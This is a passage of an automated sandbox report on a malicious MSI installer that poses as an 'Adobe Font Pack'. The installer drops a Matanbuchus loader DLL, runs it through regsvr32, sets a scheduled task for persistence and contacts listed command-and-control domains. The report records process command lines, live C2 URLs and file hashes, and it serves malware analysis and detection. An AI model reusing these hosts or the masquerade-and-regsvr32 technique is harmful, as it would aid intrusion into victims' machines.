Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E418300 mov ecx, dword ptr fs:[00000030h]	12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E418300 mov edx, dword ptr fs:[00000030h]	12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E411300 mov eax, dword ptr fs:[00000030h]	12_2_6E411300
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E411300 mov ecx, dword ptr fs:[00000030h]	12_2_6E411300
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E420BEE mov edx, dword ptr fs:[00000030h]	12_2_6E420BEE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41A390 mov eax, dword ptr fs:[00000030h]	12_2_6E41A390
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41E160 mov ecx, dword ptr fs:[00000030h]	12_2_6E41E160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41E160 mov eax, dword ptr fs:[00000030h]	12_2_6E41E160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41E160 mov edx, dword ptr fs:[00000030h]	12_2_6E41E160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41E160 mov eax, dword ptr fs:[00000030h]	12_2_6E41E160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E421160 mov eax, dword ptr fs:[00000030h]	12_2_6E421160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E419910 mov ecx, dword ptr fs:[00000030h]	12_2_6E419910
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E419910 mov eax, dword ptr fs:[00000030h]	12_2_6E419910
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E419910 mov eax, dword ptr fs:[00000030h]	12_2_6E419910
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4589F0 mov ecx, dword ptr fs:[00000030h]	12_2_6E4589F0

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E45AF5D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_6E45AF5D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E45D490 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_6E45D490
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E45ACAD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_6E45ACAD

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: collectiontelemetrysystem.com
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 213.226.114.15 48195	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: telemetrysystemcollection.com

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 12_2_6E45AACC cpuid

12_2_6E45AACC

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 12_2_6E45AE18 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_6E45AE18

Source: C:\Windows\System32\msiexec.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	11 Scripting	2 Windows Service	2 Windows Service	2 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	1 Replication Through Removable Media	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	11 Scripting	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	11 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	24 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	21 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	14 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Modify Registry	DCSync	11 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	111 Process Injection	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Regsvr32	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
telemetrysystemcollection.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx	0%	Avira URL Cloud	safe
https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx	0%	Avira URL Cloud	safe
https://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/auth.aspx	0%	Avira URL Cloud	safe
http://collectiontelemetrysystem.com/cAUtfkUDaptk/ZRSeiy/requets/index.php	0%	Avira URL Cloud	safe
https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/auth.aspx	0%	Avira URL Cloud	safe
http://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/home.aspx	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
telemetrysystemcollection.com	213.226.114.15	true	true	1%, Virustotal, Browse	unknown
collectiontelemetrysystem.com	213.226.114.15	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx	true	Avira URL Cloud: safe	unknown
http://collectiontelemetrysystem.com/cAUtfkUDaptk/ZRSeiy/requets/index.php	true	Avira URL Cloud: safe	unknown
https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/auth.aspx	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx	regsvr32.exe	false	Avira URL Cloud: safe	unknown
https://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/auth.aspx	regsvr32.exe	false	Avira URL Cloud: safe	unknown
http://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/home.aspx	regsvr32.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
213.226.114.15	telemetrysystemcollection.com	Russian Federation		9002	RETN-ASEU	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	647225
Start date and time: 16/06/202220:20:32	2022-06-16 20:20:32 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SCAN-068589.pdf.msi
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.troj.evad.winMSI@13/12@9/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 10.7% (good quality ratio 10.6%) Quality average: 84.6% Quality standard deviation: 17.5%
HCA Information:	Successful, ratio: 84% Number of executed functions: 22 Number of non-executed functions: 51
Cookbook Comments:	Found application associated with file extension: .msi Adjust boot time Enable AMSI Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, VSSVC.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtFsControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:22:14	API Interceptor	1970x Sleep call for process: msiexec.exe modified
20:22:57	API Interceptor	222x Sleep call for process: wscript.exe modified
20:22:58	API Interceptor	179x Sleep call for process: regsvr32.exe modified
20:23:52	Task Scheduler	Run new task: 5507 path: %windir%\system32\regsvr32.exe s>-n -i:"Updateheck" "C:\Users\user\AppData\Local\x86\5507.nls"
20:23:53	API Interceptor	214x Sleep call for process: taskeng.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
213.226.114.15	SCAN-287004.pdf.msi	Get hash	malicious	Browse	collectiontelemetrysystem.com/cAUtfkUDaptk/ZRSeiy/requets/index.php
	SCAN-287004.html	Get hash	malicious	Browse	collectiontelemetrysystem.com/cAUtfkUDaptk/ZRSeiy/requets/index.php
	SCAN-287004.pdf.msi	Get hash	malicious	Browse	collectiontelemetrysystem.com/cAUtfkUDaptk/ZRSeiy/requets/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
telemetrysystemcollection.com	SCAN-287004.pdf.msi	Get hash	malicious	Browse	213.226.114.15
	SCAN-287004.html	Get hash	malicious	Browse	213.226.114.15
	SCAN-287004.pdf.msi	Get hash	malicious	Browse	213.226.114.15
collectiontelemetrysystem.com	SCAN-287004.pdf.msi	Get hash	malicious	Browse	213.226.114.15
	SCAN-287004.html	Get hash	malicious	Browse	213.226.114.15
	SCAN-287004.pdf.msi	Get hash	malicious	Browse	213.226.114.15

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RETN-ASEU	SCAN-287004.pdf.msi	Get hash	malicious	Browse	213.226.114.15
	SCAN-287004.html	Get hash	malicious	Browse	213.226.114.15
	SCAN-287004.pdf.msi	Get hash	malicious	Browse	213.226.114.15
	http://soaheeme.net	Get hash	malicious	Browse	139.45.197.238
	studiorobertogalloro-file-13.06.2022.doc	Get hash	malicious	Browse	213.178.155.196
	viaggiemiraggi.invoice.13.06.2022.doc	Get hash	malicious	Browse	213.178.155.196
	quipo.file.13.06.22.doc	Get hash	malicious	Browse	213.178.155.196
	JqO5HR5WK8.dll	Get hash	malicious	Browse	213.178.155.196
	JqO5HR5WK8.dll	Get hash	malicious	Browse	213.178.155.196
	BvFdY2YcnzM7Cx1-rRkiVlvgzwLpQYDpzw__.dll	Get hash	malicious	Browse	213.178.155.196
	avvpghizzoni doc 13.06.22.doc	Get hash	malicious	Browse	213.178.155.196
	BvFdY2YcnzM7Cx1-rRkiVlvgzwLpQYDpzw__.dll	Get hash	malicious	Browse	213.178.155.196
	cittadirovigo,invoice,13.06.2022.doc	Get hash	malicious	Browse	213.178.155.196
	http://dibsemey.com	Get hash	malicious	Browse	139.45.197.250
	https://scanner.topsec.com/?d=2120&r=show&u=https%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D15%26url%3Dhttps%253A%252F%252Fwww.google.com%252Furl%253Fq%253Dhttps%25253A%25252F%25252Fultimatesuccess.ca%25252Fwp-admin%25252Fcss%25252Fcolors%25252Fsunrise%2526sa%253DD%2526sntz%253D1%2526usg%253DAOvVaw3lYXNEOiIvnP3sTiO83Zu7&t=cfd41993e58bce81a9b8578185c43dc4c2dde2a7	Get hash	malicious	Browse	139.45.197.237
	https://aflix.site/movie.php?id=9769	Get hash	malicious	Browse	139.45.197.239
	r4z0r.arm7	Get hash	malicious	Browse	87.245.239.244
	https://noticiasahora.org/30/05/2022/ale-galan-y-juan-lebron-ganan-el-primero-del-major-premier-padel-de-italia/	Get hash	malicious	Browse	139.45.197.237
	https://glimtors.net:443/ntfc.php?p=3156533	Get hash	malicious	Browse	139.45.197.251
	8GLAU1Loio	Get hash	malicious	Browse	87.245.193.114

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	SCAN-287004.pdf.msi	Get hash	malicious	Browse	213.226.114.15
	675748497416145.xls	Get hash	malicious	Browse	213.226.114.15
	Vantageconcept.xls	Get hash	malicious	Browse	213.226.114.15
	O122355422156BV.xls	Get hash	malicious	Browse	213.226.114.15
	2022-06-16_1324.xls	Get hash	malicious	Browse	213.226.114.15
	Iemt.isuzu.co.xls	Get hash	malicious	Browse	213.226.114.15
	DHL-AWB.xlsx	Get hash	malicious	Browse	213.226.114.15
	0102597538535693_1.xls	Get hash	malicious	Browse	213.226.114.15
	100012784973204147_1.xls	Get hash	malicious	Browse	213.226.114.15
	10060423493904881105130_1.xls	Get hash	malicious	Browse	213.226.114.15
	36035017751609285787258.doc.xls	Get hash	malicious	Browse	213.226.114.15
	170134707819168.xls	Get hash	malicious	Browse	213.226.114.15
	4947708044172080659.doc.xls	Get hash	malicious	Browse	213.226.114.15
	52856537379286570.xls	Get hash	malicious	Browse	213.226.114.15
	PO 06162022.xls	Get hash	malicious	Browse	213.226.114.15
	8096446330636675.xls	Get hash	malicious	Browse	213.226.114.15
	Beaver Valley Mall.xls	Get hash	malicious	Browse	213.226.114.15
	Gmail_1.xls	Get hash	malicious	Browse	213.226.114.15
	Gmail_3.xls	Get hash	malicious	Browse	213.226.114.15
	NY1477315613613337Q.xls	Get hash	malicious	Browse	213.226.114.15

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\x86\5507.nls	SCAN-287004.pdf.msi	Get hash	malicious	Browse
	SCAN-287004.html	Get hash	malicious	Browse
	SCAN-287004.pdf.msi	Get hash	malicious	Browse

Created / dropped Files

C:\Config.Msi\68bd59.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	8522
Entropy (8bit):	5.516077332200594
Encrypted:	false
SSDEEP:	96:ZW3ACeeqy3EUlgeGCsAqEHUlgeGC6jlk8sAqE7HH0QBxLGjci6DAj/xC2p3BMvHD:ZW3qeblgeVF0lgeViHd2p0
MD5:	5E731537ED299523681EC78E4DB19DBB
SHA1:	F6FABE59F6D5D2EC76411B475928AA0D18E722D2
SHA-256:	206F318B6286F9AE19A90797AA978489CFDFDE82732EF073834DE1D514849EAA
SHA-512:	132CAF6A9569395F4888787FDD027134350AC4ED7E8B82231D3C75AA48153509D0FD2571D440A25A09A51B656EAE713884BCB62CE7DEE13A1C0B5115BF48995A
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@...T.@.....@.....@.....@.....@.....@......&.{CC038BA5-7236-4713-8948-DFF082243638}..Adobe Font Pack 3.0.12.9..SCAN-068589.pdf.msi.@.....@.....@.....@........&.{717A1233-ED34-40D0-B14C-98BF5C0B90FE}.....@.....@.....@.....@.......@.....@.....@.......@......Adobe Font Pack 3.0.12.9......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{82B5B2FD-2237-42AB-9F03-B3B9EAB30000}&.{CC038BA5-7236-4713-8948-DFF082243638}.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..+.C:\Users\user\AppData\Local\AdobeFontPack\....3.C:\Users\user\AppData\Local\AdobeFontPack\main.dll....5.C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs....WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@......Software\AdobeFontPack...@....(.&...AdobeFontPack..1....RegisterProduct..Registering product..[1]......C:\Windows\Installer\68bd5a.msi.

C:\Users\user\AppData\Local\AdobeFontPack\main.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	410624
Entropy (8bit):	5.9224762709107495
Encrypted:	false
SSDEEP:	6144:XtugFAmTHh/rONOBHtnee6fIhO1MMwWPzRRTuxeLaRRZMuspQ1fg3I5:9tWmTBpHtee6IcUWbHI/RRZMuV
MD5:	93F85342EBEFA3B658EE04DC42C0DF3A
SHA1:	844736386B67D21566B7A23BEDD42C4BB0223C3D
SHA-256:	60F030597C75F9DF0F7A494CB5432B600D41775CFE5CF13006C1448FA3A68D8D
SHA-512:	3CF20695B83E9B45804214A6B96337CFF29DA6993DB8BA368380BA1E5455B679BBA3646F6B27D2BAC239CAF4F6697FB9087D5679674065EBA9D7FD514C85EDB2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\AppData\Local\AdobeFontPack\main.dll, Author: Joe Security
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t..j0f.90f.90f.9$..8:f.9$..8.f.9$..8"f.9b..8.f.9b..8?f.9b..8%f.9$..8!f.90f.9Sf.9h..85f.9h..81f.9h..81f.9Rich0f.9........PE..L....G+b.........."!......................................................................@..........................)..x....)...............................`..8...l...T...............................@...............d............................text.............................. ..`.rdata...q.......r..................@..@.data........@....... ..............@....reloc..8....`.......*..............@..B.rsrc................>..............@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	68
Entropy (8bit):	4.235754797707785
Encrypted:	false
SSDEEP:	3:LwBxFkvH48nVWrUFVAFkvH4cXK4v:cHFkvY8nqU4FkvYcXn
MD5:	0308AA2C8DAB8A69DE41F5D16679BB9B
SHA1:	C6827BF44A433FF086E787653361859D6F6E2FB3
SHA-256:	0A7E8FD68575DB5F84C18B9A26E4058323D1357E2A29A5B12278E4BFA6939489
SHA-512:	1A1CA92E3C8D52C8B5ADBB3117A88D8A2A8C33EAF2F7B0D620FE006653F57F4BA0B803884616594CA31E13A1B0B59DDAE52CECF044621EC44371084DAC6BEB72
Malicious:	false
Reputation:	low
Preview:	MsgBox "Adobe Acrobat error 0x00001803", 16, "Adobe Acrobat Error"..

C:\Users\user\AppData\Local\Temp\~DF275DF4B13EC3E34F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF6CBE8E5B62F6E221.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	0.11466387433239424
Encrypted:	false
SSDEEP:	48:9elFDcCm818lEOHDUUSoOHDUUS5grshJMd:96FDcCCDUUYDUU2C
MD5:	F04465992AD1F9571DD04150F6829537
SHA1:	86CFB508BF28611F5B02152BCDB2A91A34F42A62
SHA-256:	6D379773A0414C751719EC792DBABBAA02B1D1207F441984D985767531CA1E35
SHA-512:	77AF0B215B1B91CFE55392469384F26B74A07E018105F2A547FA4BB4812EBB50A6FF75A9A70D756924DBE5433C5BB7E3D6DEB25BDAABD9476FA008B42EA11506
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF84F6DE3826C4FEB0.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07381017249986964
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOTz1p+YOUKVky6l1:2F0i8n0itFzDHFnWYB1
MD5:	9B0442731B7D29BA606F701BE8E6BE7B
SHA1:	EFDCF7F6B305840A7AE2562F412C3B1207C22D8A
SHA-256:	2C67D7EBF96F60E0339876F9B2EBDA31884679B605F97CDC354555A7D319F77D
SHA-512:	911A8F4C0CB3A5F881098FDD399516E3CDD1D018FDEF3A2F1263977B477A805132F90329801F5BE4908FE52A4A490DF03E5EDD73AA87E7C33826F279518226FC
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\x86\5507.nls

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	410624
Entropy (8bit):	5.922447446405698
Encrypted:	false
SSDEEP:	6144:2tugFAmTHh/rONOBHtnee6fIhO1MMwWPzRRTuxeLaRRZMuspQ1fg3U5:wtWmTBpHtee6IcUWbHI/RRZMux
MD5:	95159F5427C976D28C86AA716799E6DE
SHA1:	4BFBF8C48F17A7C7269DFC314E5E5BD166DB857F
SHA-256:	F8CC2CF36E193774F13C9C5F23AB777496DCD7CA588F4F73B45A7A5FFA96145E
SHA-512:	04AF830CECD7EC8BF5D2F637A0E52036800D171F8D74F837648BD2129F8D19385FA46AE39C4CB0FC47C03AAA32D17F8739661D8B57B0D3D74532DE29FC20F629
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\AppData\Local\x86\5507.nls, Author: Joe Security
Joe Sandbox View:	Filename: SCAN-287004.pdf.msi, Detection: malicious, Browse Filename: SCAN-287004.html, Detection: malicious, Browse Filename: SCAN-287004.pdf.msi, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t..j0f.90f.90f.9$..8:f.9$..8.f.9$..8"f.9b..8.f.9b..8?f.9b..8%f.9$..8!f.90f.9Sf.9h..85f.9h..81f.9h..81f.9Rich0f.9........PE..L....'.a.........."!.................................................................J....@..........................)..x....)...............................`..8...l...T...............................@...............d............................text.............................. ..`.rdata...q.......r..................@..@.data........@....... ..............@....reloc..8....`.......*..............@..B.rsrc................>..............@..@................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\68bd57.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Adobe Font Pack 3.0.12.9, Author: Adobe Inc., Keywords: Installer, Comments: Adobe Font Pack, Template: Intel;1033, Revision Number: {717A1233-ED34-40D0-B14C-98BF5C0B90FE}, Create Time/Date: Thu Jun 16 10:54:52 2022, Last Saved Time/Date: Thu Jun 16 10:54:52 2022, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
Category:	dropped
Size (bytes):	229376
Entropy (8bit):	7.611236658195378
Encrypted:	false
SSDEEP:	3072:58Xa2c1oag7+aqKVIma2OGwFLOAL4/QUPL8gHtHdNMxOzXNcO2nB:L9oa1aq9oOGwFVL4/QUDDNHdOxOzd0n
MD5:	C0EE31BC6536AE8CB7E5D8809676920A
SHA1:	B21482D1072E5CB65488F2C181F38C75D8C80DCD
SHA-256:	2D8740EA16E9457A358EBEA73AD377FF75F7AA9BDF748F0D801F5A261977EDA4
SHA-512:	66ED8F4762F3CB7B4026C9D7EEAEC2EE4E8275495D527F99FD163D0A72F436EF2E2FDAD88F7DCAD87E3DD10C7AFFFE7B2F0F6C3412DE68C16E96F9377CB4FE1D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\68bd58.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5108574184530812
Encrypted:	false
SSDEEP:	48:LGG60kcDHjlutCJMNzOHDUUS5gr2OHDUUSI818lNDcCfel:qG65VQCuDUUjDUUJDcCf6
MD5:	227FE3F4A567CFAB46E16238324AAD53
SHA1:	38D9F05BA1B5DA5B35F3CBD473E614B4C216F764
SHA-256:	37DB8D549986AC365D1913CBE722E94A1A5A4F8385B5D87F3063BAB357D9754A
SHA-512:	6755A7C2843AC7EC7F3DC13DAB6E0D9B7BD07E53B86165E9BC9611440D3FBF70E0D605B2EEF9823F6333FDBED18DEB34076F3B59079E072CDF86B7E79DF7E2DA
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\68bd5a.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Adobe Font Pack 3.0.12.9, Author: Adobe Inc., Keywords: Installer, Comments: Adobe Font Pack, Template: Intel;1033, Revision Number: {717A1233-ED34-40D0-B14C-98BF5C0B90FE}, Create Time/Date: Thu Jun 16 10:54:52 2022, Last Saved Time/Date: Thu Jun 16 10:54:52 2022, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
Category:	dropped
Size (bytes):	229376
